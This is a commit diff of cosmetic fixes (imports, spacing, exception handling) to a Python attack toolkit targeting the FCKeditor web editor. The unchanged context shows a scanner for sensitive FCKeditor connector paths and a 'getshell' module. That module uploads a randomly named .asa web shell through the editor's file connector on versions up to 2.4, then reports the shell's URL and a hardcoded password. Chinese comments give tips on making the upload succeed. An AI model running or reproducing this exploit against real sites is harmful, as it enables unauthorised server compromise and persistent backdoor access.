fix

fckeditor/Main_fckeditor.py

@@ -1,5 +1,4 @@
 # -*- coding: utf-8 -*-
-import os
 import fckeditor.fckeditor_version
 import fckeditor.fckeditor_dangerfile
 import fckeditor.fckeditor_getshell
@@ -11,7 +10,5 @@ def exec(URL):
     fckeditor.fckeditor_getshell.attack(URL)
 
 
-
-
 if __name__ == "__main__":
     exec()

fckeditor/fckeditor_dangerfile.py

@@ -1,14 +1,12 @@
 # -*- coding: utf-8 -*-
-import sys
 import requests
-import time
 
 '''
 Usage:
     moon.py -u  fck http://127.0.0.1:8080
-    
 '''
 
+
 def attack(URL):
     urls = (
         '/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
@@ -40,23 +38,21 @@ def attack(URL):
     )
 
     print('[+]开始检测-Fckeditor敏感目录。[+]')
-    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
-    headers={"User-Agent":user_agent}
+    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
+    headers = {"User-Agent":user_agent}
     for url in urls:
         url = URL + url
         try:
             verify_response = requests.get(url, headers=headers)
-
             if verify_response.status_code == 200:
                 print('存在此页面：'+url)
-            else :
+            else:
                 continue
-        except :
+        except Exception:
             print("Someerror!")
     print('[+]检测结束-Fckeditor敏感目录。[+]')
     print('\n')
 
+
 if __name__ == "__main__":
     attack()
-
-

fckeditor/fckeditor_getshell.py

@@ -14,9 +14,9 @@ Usage:
     实际测试过程中还是上传asa可以，以下脚本也基于asa上传
     fck编辑器如要上传文件需配置相关项目，如果出现上传成功且获取上传路径失败，就可能是配置不允许上传。
     返回包出现这类文字基本上就是设置不允许上传：This connector is disabled. Please check the
-    
 '''
 
+
 def gen_shell():
     min_char = 4
     max_char = 12
@@ -24,6 +24,7 @@ def gen_shell():
     shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char)))
     return shell_name
 
+
 def geturl(URL):
     user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
     headers={"User-Agent":user_agent}
@@ -42,9 +43,10 @@ def geturl(URL):
             print("此Fckeditor上传路径为：" + soup.group(1))
             return soup.group(1)
             break
-        except:
+        except Exception:
             pass
 
+
 def attack(URL):
     print('[+]开始检测-Fckeditor<=2.4版本简单文件上传。asp[+]')
     url = URL + '/editor/filemanager/browser/default/connectors/test.html'
@@ -68,12 +70,12 @@ def attack(URL):
             try:
                 aim_url = geturl(URL)
                 URL = re.match('http://(.*?)/',URL).group()
-                print('Shell地址为：'+URL+ aim_url+shellname+'.asa')
+                print('Shell地址为：'+URL + aim_url+shellname+'.asa')
                 print('shell密码为：gutf987y97y97。')
-            except:
+            except Exception:
                 print('获取上传路径失败，shell名为：'+shellname+'.asa')
                 print('shell密码为：gutf987y97y97。')
-        except:
+        except Exception:
             print('上传shell发生错误。')
     else:
         print('未发现该页面：'+url)
@@ -82,4 +84,4 @@ def attack(URL):
 
 
 if __name__ == "__main__":
-    attack()
+    attack()